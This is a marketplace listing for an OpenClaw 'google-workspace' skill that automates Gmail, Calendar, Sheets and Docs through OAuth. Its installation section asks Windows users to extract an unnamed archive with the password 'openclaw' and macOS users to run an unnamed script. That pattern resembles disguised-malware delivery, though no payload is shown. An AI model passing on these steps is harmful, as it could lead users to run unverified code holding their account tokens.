google-workspace
Interact with Google Workspace services - Gmail, Calendar, Contacts, Sheets, and Docs. Send emails, manage calendar events, read/write spreadsheets, create documents, and sync contacts.
Why use this skill?
Learn how to use the Google Workspace skill for OpenClaw to automate Gmail, Calendar, Sheets, and Docs tasks with secure API integration and AI-driven workflow efficiency.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/google-workspace-gbvycWhat This Skill Does
The google-workspace skill for OpenClaw provides a powerful interface for automating tasks across the Google Workspace ecosystem. It acts as a bridge between the OpenClaw agent and Google's suite of productivity tools, including Gmail, Google Calendar, Google Sheets, and Google Docs. By leveraging OAuth 2.0 authentication, the skill securely connects to your private data, allowing you to read emails, schedule meetings, manipulate spreadsheets, and generate documents programmatically. This skill is designed for power users and developers looking to streamline their daily workflows by delegating repetitive administrative tasks to an AI agent, ensuring that your data remains synchronized and accessible through the command line or agent-assisted automation.
Installation
To begin, ensure you have the openclaw-agent installed on your machine. For Windows, download and extract the archive using the password 'openclaw'. For macOS, execute the provided installation script in your terminal. Once the agent is ready, install the skill using the command: clawhub install openclaw/skills/skills/hightower6eu/google-workspace-gbvyc. After installation, you must configure a Google Cloud Project, enable the required APIs (Gmail, Calendar, Sheets, Docs, People), and place your credentials.json in the root directory. Run the provided google_auth.py script once to authorize your account via your browser.
Use Cases
- Automating email triage: Summarize high-priority emails or draft responses to common customer inquiries.
- Meeting management: Query your calendar for the next three appointments or automatically create events from parsed email data.
- Data reporting: Extract data from live sources and write them directly into organized Google Sheets for real-time tracking.
- Document generation: Create standardized documents or reports using templates updated with real-time data.
Example Prompts
- "Check my Gmail for any urgent messages from my project lead today and summarize them."
- "Look at my calendar and find a 30-minute opening tomorrow afternoon to schedule a team sync."
- "Take the data from my latest report and append the findings into the project-tracking Google Sheet."
Tips & Limitations
Always ensure the openclaw-agent is active before invoking commands. Note that Google APIs have rate limits; avoid executing bulk requests in rapid succession. Authentication tokens are saved locally in token.pickle; keep this file secure. For complex document manipulation, verify the specific API scopes enabled in your Google Cloud Console, as adding new scopes requires re-authorizing the application.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-google-workspace-gbvyc": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, file-read, file-write, external-api
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.